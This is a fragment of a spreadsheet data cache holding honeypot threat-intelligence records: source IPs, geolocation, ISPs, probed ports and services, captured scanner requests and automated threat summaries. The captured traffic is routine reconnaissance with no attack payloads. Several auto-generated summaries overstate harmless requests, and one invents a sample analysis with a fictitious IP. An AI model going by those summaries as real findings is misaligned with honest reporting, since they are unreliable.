    <s v="55.2005"/>
    <s v="135377"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="UCLOUD INFORMATION TECHNOLOGY (HK) LIMITED"/>
    <s v="hosting"/>
    <s v="Ucloud Information Technology (hk) Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_HTTPS:{'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.9,zh-TW;q=0.8,en;q=0.7,*;q=0.5', 'Connection': 'Close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;NA&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.9,zh-TW;q=0.8,en;q=0.7,*;q=0.5', 'Connection': 'Close', 'Host': '5.253.40.123:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Host': '5.253.40.123:443', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Host': '5.253.40.123:443', 'User-Agent': 'Go-http-client/1.1', 'method': 'GET', 'uri': '/robots.txt'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Language': 'zh-CN,zh;q=0.9,zh-TW;q=0.8,en;q=0.7,*;q=0.5', 'Connection': 'Close', 'Host': '109.123.229.33:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a59a:6c03"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <s v="Possible malicious activity involves an unknown user attempting to access a favicon on the server using Go programming language's HTTP client, potentially for reconnaissance or as part of a larger attack. &amp;&amp; An unknown client is attempting to access a server, likely an intrusion attempt for reconnaissance or exploitation of a known vulnerability, possibly hosted on the server at IP address 5.253.40.123 and port 443. _x000a_The request is requesting a favicon icon which could be an initial probing action by an attacker. &amp;&amp; Malicious scanner is probing a system for open ports and vulnerabilities on IP address 109.123.229.33, using a fake user agent to evade detection. This could be an initial step in a larger attack or reconnaissance mission. The scanner may also attempt other types of attacks if a vulnerability is found. &amp;&amp; This log entry suggests a potential brute-force or reconnaissance attempt, as it involves a GET request to the root directory of the system with a generic User-Agent and Accept headers that may indicate an attempt to identify vulnerabilities or map out system services. The IP address 109.123.229.33 has made this connection, likely originating from a remote location. &amp;&amp; There is no log data provided, so I have nothing to analyze."/>
    <s v="Web Scan &amp;&amp; Scanning GET"/>
  </r>
  <r>
    <x v="329"/>
    <x v="329"/>
    <s v="60-251-193-230.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T22:11:24"/>
    <d v="2024-03-09T01:03:00"/>
    <d v="2025-04-29T22:11:24"/>
    <n v="49"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;9623&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3cfb:c1e6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No activity detected for Telnet service, but this is unusual because it's not explicitly denied or blocked. _x000a__x000a_This could indicate that the malicious entity attempted to use the Telnet service but was either unaware of its existence or did not attempt to utilize it. _x000a__x000a_The lack of any other information about the interaction suggests a possible reconnaissance or probing activity. &amp;&amp; No log data provided, unable to analyze. _x000a__x000a_However, assuming some sample log data is given, here's an example analysis:_x000a__x000a_A suspicious connection was made from IP address 192.168.1.100, with the user attempting to access a service that is not publicly available._x000a_The request contained malicious parameters that could potentially lead to system compromise or unauthorized access._x000a_Further investigation would be required to determine the full extent of the potential threat."/>
    <m/>
  </r>
  <r>
    <x v="330"/>
    <x v="330"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T22:10:24"/>
    <d v="2024-02-26T18:49:14"/>
    <d v="2025-04-29T22:10:24"/>
    <n v="146"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;13337&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Limited"/>
    <s v="business"/>
    <s v="Bharti Telenet Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b646:77e9"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="331"/>
    <x v="331"/>
    <s v="NA&amp;&amp;240.199.148.122.sta.wbroadband.net.au"/>
    <x v="0"/>
    <d v="2025-04-29T22:10:11"/>
    <d v="2024-06-20T20:58:54"/>
    <d v="2025-04-29T22:10:11"/>
    <n v="83"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;5900&amp;&amp;53&amp;&amp;445&amp;&amp;1521&amp;&amp;3389&amp;&amp;50352&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="VIC"/>
    <s v="Victoria"/>
    <s v="Melbourne"/>
    <s v="Melbourne"/>
    <s v="2158177"/>
    <s v="3001"/>
    <s v="-37.8136"/>
    <s v="144.963"/>
    <s v="9443"/>
    <s v="VOCUS PTY LTD"/>
    <s v="Vocus PTY LTD"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a94:c7f0"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="332"/>
    <x v="332"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T22:03:01"/>
    <d v="2025-03-16T12:13:02"/>
    <d v="2025-04-29T22:03:01"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Samrāla"/>
    <s v="1257503"/>
    <s v="NA"/>
    <s v="30.836"/>
    <s v="76.1932"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:1614"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="333"/>
    <x v="333"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T22:01:55"/>
    <d v="2025-04-24T00:37:14"/>
    <d v="2025-04-29T22:01:55"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="BA"/>
    <s v="Bahia"/>
    <s v="Araci Municipality"/>
    <s v="Araci"/>
    <s v="3471854"/>
    <s v="NA"/>
    <s v="-11.3333"/>
    <s v="-38.9667"/>
    <s v="267659"/>
    <s v="CONEXXUS SERVICO DE INFORMATICA"/>
    <s v="Conexxus Servico De Informatica"/>
    <s v="business"/>
    <s v="Conexxus Servico De Informatica"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2de0:851c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No activity detected for TELNET service, possibly indicating that it is not being used or exploited by attackers. _x000a_TELNET is an older protocol often targeted by malicious actors for password guessing attacks or other forms of exploitation._x000a_This lack of activity could also suggest that the service is not exposed to the public or properly configured."/>
    <m/>
  </r>
  <r>
    <x v="334"/>
    <x v="334"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:54:59"/>
    <d v="2023-11-30T08:59:37"/>
    <d v="2025-04-29T21:54:59"/>
    <n v="365"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_FTP_H21&amp;&amp;SMA-LAB_FTP_H3&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_SNMP_H38&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_SNMP_H40&amp;&amp;SMA-LAB_RDP_H11&amp;&amp;SMA-LAB_SIP_H2&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_SNMP_H28&amp;&amp;SMA-LAB_MYSQL_H7&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_ORACLE_H3&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_MSSQL_H12&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_SOCKS5_H47&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_SNMP_H47&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_MYSQL_H17&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_IMAP_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;3306&amp;&amp;443&amp;&amp;32120&amp;&amp;1433&amp;&amp;389&amp;&amp;110&amp;&amp;5432&amp;&amp;3389&amp;&amp;NA&amp;&amp;1521&amp;&amp;9100&amp;&amp;56607&amp;&amp;23&amp;&amp;6379&amp;&amp;1080&amp;&amp;143&amp;&amp;80&amp;&amp;21&amp;&amp;56116&amp;&amp;55146&amp;&amp;5900&amp;&amp;52540"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}"/>
    <n v="103"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2022-01-11"/>
    <s v="PAN-22"/>
    <s v="2022-01-11"/>
    <s v="command&amp;&amp;connection&amp;&amp;query&amp;&amp;GET&amp;&amp;NA&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lAdntg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EsZnil'}}&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f11"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The threat actor is attempting to scan and exploit various services on the network, likely as part of a reconnaissance phase or a brute-force attack. &amp;&amp; The threat actor is scanning and probing various services on the network, likely attempting to identify vulnerabilities or gain unauthorized access. &amp;&amp; The attackers are attempting to gather sensitive information and exploit vulnerabilities in various systems, including servers, databases, and network devices. They are using reconnaissance techniques to identify potential targets, followed by attempts to gain unauthorized access or escalate privileges. &amp;&amp; The attacker is attempting to gather information about the target system's services and configurations, likely for reconnaissance purposes. They are sending various types of requests to different ports and protocols, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and others. &amp;&amp; The attacker is attempting to scan and potentially exploit various services on the targeted network, including DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and others. The attacker's activities suggest a reconnaissance phase to identify vulnerable services and potentially exploit them for malicious purposes. &amp;&amp; The attacker is scanning and probing various services on a network, attempting to identify vulnerabilities and gain unauthorized access. They are using multiple protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, etc. &amp;&amp; The attacker is attempting to scan for vulnerabilities and gather information about the system, likely as a precursor to further malicious activity such as exploitation or data exfiltration."/>
    <s v="  &amp;&amp;   &amp;&amp;  &amp;&amp;  Port scanning &amp;&amp;  &amp;&amp; **Port Scanning** &amp;&amp; Reconnaissance &amp;&amp; FTP Brute &amp;&amp; TLS Auth &amp;&amp; TLS Attack"/>
  </r>
  <r>
    <x v="335"/>
    <x v="335"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:51:20"/>
    <d v="2025-04-29T21:51:20"/>
    <d v="2025-04-29T21:51:20"/>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5:e4ea"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="336"/>
    <x v="336"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:50:40"/>
    <d v="2025-02-22T11:50:19"/>
    <d v="2025-04-29T21:50:40"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UK"/>
    <s v="Uttarakhand"/>
    <s v="Dehradun"/>
    <s v="Gorakhpur (Defence Colony)"/>
    <s v="10323057"/>
    <s v="248012"/>
    <s v="30.2862"/>
    <s v="78.0544"/>
    <s v="138315"/>
    <s v="Countrylink Communiction Pvt Ltd"/>
    <s v="Countrylink Communiction Pvt Ltd"/>
    <s v="business"/>
    <s v="Countrylink Communiction Pvt Ltd"/>
    <s v="2019-02-04"/>
    <s v="CLCPL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6786:2ed5"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="337"/>
    <x v="337"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:29:41"/>
    <d v="2023-11-29T03:29:57"/>
    <d v="2025-04-29T21:29:41"/>
    <n v="34"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="10404&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="AR"/>
    <s v="Argentina"/>
    <s v="C"/>
    <s v="Buenos Aires F.D."/>
    <s v="NA"/>
    <s v="Buenos Aires"/>
    <s v="3435910"/>
    <s v="NA"/>
    <s v="-34.6037"/>
    <s v="-58.3816"/>
    <s v="16814"/>
    <s v="NSS S.A."/>
    <s v="NSS S.A."/>
    <s v="business"/>
    <s v="NSS S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bed2:2586"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="338"/>
    <x v="338"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:20:55"/>
    <d v="2024-05-21T06:02:31"/>
    <d v="2025-04-29T21:20:55"/>
    <n v="489"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_IRC_H38&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_ORACLE_H8&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_RDP_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_LDAP_H